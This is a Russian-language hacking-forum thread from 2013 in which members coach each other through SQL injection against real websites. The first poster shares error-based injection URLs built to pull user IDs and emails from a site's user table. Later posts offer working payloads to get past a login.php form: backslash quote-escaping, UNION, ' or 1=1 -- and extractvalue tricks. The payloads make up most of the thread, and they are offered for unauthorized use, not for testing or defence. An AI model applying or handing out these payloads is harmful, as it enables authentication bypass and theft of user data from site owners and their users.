02.10.2013, 18:39
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами:
7278806
Репутация:
26
|
|
Сообщение от Evil_Genius
Вобщем делаю sql запрос:
site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Id ,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+limi t+0,1)+)+from+`information_schema`.tables+limit+0, 1),floor(rand(0)*2))x+from+`information_schema`.ta bles+group+by+x)a)+and+1=1
На что мне благополучно выдает Duplicate entry '~'1'~1' for key 'group_key'. т.е выдает нужны резульат.
Делаем еще один запрос:
site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Em ail,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+l imit+0,1)+)+from+`information_schema`.tables+limit +0,1),floor(rand(0)*2))x+from+`information_schema` .tables+group+by+x)a)+and+1=1
На что мне выдает: Subquery returns more than 1 row - чертов лимин(((
Подскажите, как выполнить второй запрос - чтобы избежать лимита.
У тебя лишнее
Код:
+from+`information_schema`.tables+limit+0,1
Возьми шаблон, и переделай под свой запрос
Код:
(select 1 from(select count(*),concat((select table_name from information_schema.tables order by schema_name limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
?file=2+and(select 1 from(select count(*),concat((select table_name from information_schema.tables order by schema_name limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and 1=1
p.s. результат подзапроса должен быть - одна строка.
|
|
|
03.10.2013, 17:09
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
В общем есть сайт, на нем login.php
При пост запросе:
Head
Host: сайт.нет
Content-Type: application/x-www-form-urlencoded
post
login=1&password=%5c
Выдает следующее
Раскрутить скулю не поможете?
Не знаю что дальше делать) |
|
|
|
03.10.2013, 17:41
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от zombak18
В общем есть сайт, на нем login.php
При пост запросе:
Head
Host: сайт.нет
Content-Type: application/x-www-form-urlencoded
post
login=1&password=%5c
Выдает следующее
Раскрутить скулю не поможете?
Не знаю что дальше делать) Если кавычки фильтруются и в имени то-же самое, то тогда так:
Код:
Имя пользователя: \
Пароль: union select .... -- 1
|
|
|
|
03.10.2013, 17:50
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
Сообщение от XAMEHA
Если кавычки фильтруются и в имени то-же самое, то тогда так:
Код:
Имя пользователя: \
Пароль: union select .... -- 1
При таком запросе ничего не происходит(
login=\&password=union select .... -- 1
/а во!
вставил в поля
и что дальше?(
|
|
|
|
03.10.2013, 19:01
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от zombak18
При таком запросе ничего не происходит(
login=\&password=union select .... -- 1
/а во!
вставил в поля
и что дальше?( Почитать фак. Но если уж ооочень не хочется, то вместо точек, тебе надо было подставить свой запрос, а точнее начать выяснять количество колонок в таблице.
|
|
|
|
03.10.2013, 19:11
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от zombak18
login=\&password=union select .... -- 1
login=admin' -- t&password=1
Попробуйте.
|
|
|
|
03.10.2013, 19:18
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
Сообщение от Inoms
login=admin' -- t&password=1
Попробуйте.
Нет, так не хочет.. походу сама дыра в обработке пароля, а не в логине
Сообщение от Melfis
Почитать фак. Но если уж ооочень не хочется, то вместо точек, тебе надо было подставить свой запрос, а точнее начать выяснять количество колонок в таблице.
Например?
|
|
|
|
03.10.2013, 19:23
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Нет, это потому что на конце логина дописался слеш ,я его не заметил, такого пользователя естественно нет в базе. Хотя ещё не совсем понятно, как там с ковычками обстоят дела
login=admin&password=' or 1=1 -- t
Вполне может сработать.
|
|
|
|
03.10.2013, 19:31
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
Сообщение от Inoms
Нет, это потому что на конце логина дописался слеш ,я его не заметил, такого пользователя естественно нет в базе. Хотя ещё не совсем понятно, как там с ковычками обстоят дела
login=admin&password=' or 1=1 -- t
Вполне может сработать.
такой игнорит(
а просто на проверку символов
'. %5c' не игнорит..
всё с %5c походу ошибку кидает
|
|
|
|
03.10.2013, 19:56
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Если на \, реагирует то весь участков, вплоть до пароля можно выставить как логин.
login=admin\&password= or extractvalue(1,concat(0x3b, user())) -- t
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
